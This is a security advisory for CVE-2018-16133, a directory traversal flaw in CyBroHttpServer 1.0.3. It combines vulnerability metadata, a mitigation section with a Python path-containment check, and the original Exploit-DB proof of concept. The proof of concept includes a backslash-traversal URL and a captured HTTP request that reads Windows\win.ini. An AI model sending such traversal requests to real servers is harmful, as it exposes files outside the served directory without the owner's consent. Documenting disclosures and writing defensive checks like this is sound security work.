vendor: CyBroHttpServer
by: Emre ÖVÜNÇ
CVSS: 5.3 MEDIUM
Directory Traversal
CWE: 22
Product Name: CyBroHttpServer
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: NO
Related CWE: CVE-2018-16133
CPE: cybrotech:cybrohttpserver:1.0.3
Tags: lfi,packetstorm,cve,cve2018,cybrotech
CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Nuclei Metadata: {'max-request': 1, 'vendor': 'cybrotech', 'product': 'cybrohttpserver'}
Platforms Tested: Windows
2018

Cybrotech CyBroHttpServer 1.0.3 – Directory Traversal

The Cybrotech CyBroHttpServer version 1.0.3 is vulnerable to directory traversal. An attacker can use this vulnerability to access files outside of the intended directory structure by manipulating the file path in the HTTP request.

Mitigation:

Update to a patched version of the software or apply appropriate security measures to prevent directory traversal attacks.
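
One form such a security measure can take is a containment check on the resolved path before any file is opened. The following is an added example, not code from the advisory or the vendor; the document root `C:\CyBro\www` and the function name `resolve_request_path` are assumptions made for illustration.

```python
import ntpath  # Windows path semantics, importable on any OS
from urllib.parse import unquote

DOCROOT = r"C:\CyBro\www"  # assumed document root, not from the advisory


def resolve_request_path(target, docroot=DOCROOT):
    """Map an HTTP request target to a file under docroot.

    Returns the normalized absolute path, or None when the target
    resolves outside the document root.
    """
    # Drop the query string, then percent-decode once.
    path = unquote(target.split("?", 1)[0])
    if "\x00" in path:
        return None
    # Treat both separators alike: the request in the advisory uses
    # backslashes, which a filter looking only for "../" never sees.
    rel = path.replace("/", "\\").lstrip("\\")
    # A drive letter would make join() discard the document root.
    drive, _ = ntpath.splitdrive(rel)
    if drive:
        return None
    root = ntpath.normpath(docroot)
    full = ntpath.normpath(ntpath.join(root, rel))
    # Compare whole path components, case-insensitively. A plain
    # startswith() would accept a sibling such as C:\CyBro\www_backup.
    try:
        common = ntpath.commonpath([root, full])
    except ValueError:
        return None
    if ntpath.normcase(common) != ntpath.normcase(root):
        return None
    return full


if __name__ == "__main__":
    # Constructed sample targets; the first is the request line shown
    # in the advisory's captured request.
    for t in ["\\..\\..\\..\\..\\Windows\\win.ini", "/index.html",
              "/%5c..%5c..%5cWindows%5cwin.ini"]:
        print(repr(t), "->", resolve_request_path(t))
```

The check works on path strings only; it does not follow junctions or symbolic links inside the document root.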

Exploit-DB raw data:

# Exploit Title: Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal
# Date: 2018-08-29
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: http://www.cybrotech.com/
# Software Link: http://www.cybrotech.com/wp-content/uploads/2016/11/CyBroHttpServer-v1.0.3.zip
# Version: v1.0.3
# Tested on: Windows
# CVE: CVE-2018-16133

# PoC
https://<host>\..\..\..\..\Windows\win.ini

# CVE-2018-16133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16133
https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
https://emreovunc.com/blog/en/CyBroHttpServer-v.1.0.3-Directory-Traversal-3.png

GET \..\..\..\..\Windows\win.ini HTTP/1.1
Host: 192.168.43.102:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1